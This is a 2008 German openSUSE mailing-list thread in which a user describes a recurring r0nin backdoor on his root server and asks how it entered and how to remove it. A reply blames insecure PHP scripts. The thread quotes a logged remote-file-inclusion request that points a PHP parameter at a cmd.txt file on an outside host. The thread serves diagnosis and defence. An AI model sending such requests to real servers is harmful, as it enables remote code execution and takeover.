Am Freitag, 18. Januar 2008 11:21:03 schrieb Juergen Langowski:
On Fri, 18 Jan 2008 10:29:34 +0100, Ralf Schneider
<ml@tapfere-schneiderleins.de> wrote:
Hallo zusammen,
so wie es aussieht, habe ich mir auf meinem Root-Server eine Backdoor eingefangen (r0nin). Hierbei werden Dateien (zwei tgz-Files, ein Perl-Skript, das Executable r0nin und ein telnet-Programm) nach /tmp und /var/tmp kopiert. Außerdem läuft ein Prozess r0nin unter dem Benutzer sdb.
Meine Fragen: - Auf welchem Weg kann man sich sowas einfangen? Gibt es in irgendwelchen Programm Schwachstellen, die das ermöglichen? - Wie werden ich das wieder los? Einfach nur die Dateien löschen und den Prozess killen hilft nichts. Spätestens nach einem Tag ist alles wieder da.
Beliebte Einfallstore sind unsichere PHP-Skripte, z.B. Content-Management-Systeme, Gästebücher, Formulare.
Im Log bei mir ist haufenweise sowas zu finden /intern/modules/addons/plugin.php?doc_root=http://charitygrants.org/images/cmd.txt? Ist das ein Versuch solch ein Backdoor zu installieren? Bye Michael -- Es gibt drei Möglichkeiten, eine Firma zu ruinieren: mit Frauen, das ist das Angenehmste; mit Spielen, das ist das Schnellste; mit Computern, das ist das Sicherste. -- Oswald Dreyer-Eimbcke _____________________________________________________________________________ http://macbyte.info/ Mobile Loadavg.: 0.90 0.76 0.83 http://dattuxi.de/ Registered Linux User #228306 Linux 2.6.22-14-x86_64 ICQ #151172379 -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org